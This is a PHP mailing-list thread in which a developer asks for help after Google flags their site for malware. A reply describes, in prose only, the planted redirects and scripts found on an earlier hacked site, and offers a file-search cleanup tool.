On 4/28/2010 7:50 PM, Ashley Sheridan wrote:
Hi all,
This isn't exactly a PHP question, but I don't know anyone else with the
collected smarts of this list. Basically, a site I built and am managing
has been identified by Google as a source of malware. Now, I've been
over the source code with a fine-toothed comb and found nothing, I've
gone over the HTML output for anything suspicious, checked ever single
Javascript file out, looked to see the server headers are correct and
aren't malformed, checked the .htaccess is as expected and have run the
site against the unmask parasites website which found no problems except
the 'suspicious' listing which Google has given it.
The Google webmaster tools tell me nothing more than 'Of the 2 pages we
tested on the site over the past 90 days, 2 page(s) resulted in
malicious software being downloaded and installed without user consent.'
It won't tell me what pages, although it tells me that the malicious
software is hosted on one domain and tells me what it is. Needless to
say I can't find that domain string anywhere in the code. I can't find
any hidden iframe tags or hidden Javascript eval() statements.
Basically now, although this is totally beyond my control, the owner of
the site is expecting me to get this sorted asap. I want to, and have
spent the entire day today looking at it, but have really come to the
point where I'm coming unstuck. I can find nothing wrong with the site
at all.
Does anyone have any helpful advice for this sort of thing? Tools that I
can use to check out the site with, or any bit of information that I can
use to fix this? I can give the URL of the site to anyone off-list if
they wish to check it out.
Thanks,
Ash
http://www.ashleysheridan.co.uk
Ross had a good suggest about planted links to external malicious sites. One of
the sites I worked on a couple of years ago had this happen. They ask me to look
into it.
There were about 90 htaccess files that redirected the user to a malicious site
whenever there was an error, 404 etc.
About 400 html files had a javascript appended on the end that sent the
visitor's IP and the file's complete URL to a website in Russia.
About 300 php files had some php code that generated html code had likewise sent
the visitor's IP and the file's complete URL to a website in Russia.
About 75 implanted php stand-alone files that were very sophisticated file
manipulators. I would have taken me days to figure out exactly what it was doing.
A couple of years ago I was involved in cleansing a site and wrote a script for
searching it. It uses regex search patterns.
Wild cards "*", covering all directories and leading text, are assumed before
the filename. However, you must include an extension or append "*" to your
filename. Can use "*.htaccess"
It list all the files meeting the criteria e.g.,
Sel File Size[bytes] File Time DirPerms Del DirOwner Dir Time
1 /.htaccess 942 8Aug09 14:33:06 0750 * system 17Apr10 20:38:56
You can select a file and view its source including an htmlentities() version
And select one or a batch to delete.
Has a convenient notepad to record your result stats and add a note. e.g.
1Apr09 21 files; "*.htaccess" => "\*" Addition htaccess files added, OK
19Jul08 6 files; "*.htaccess" => "\*"
Has good PW protection,. etc.
Easy to install, one file, instructions at the top.
I'll send you a zip if you reply and send me addr.
Al...........
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
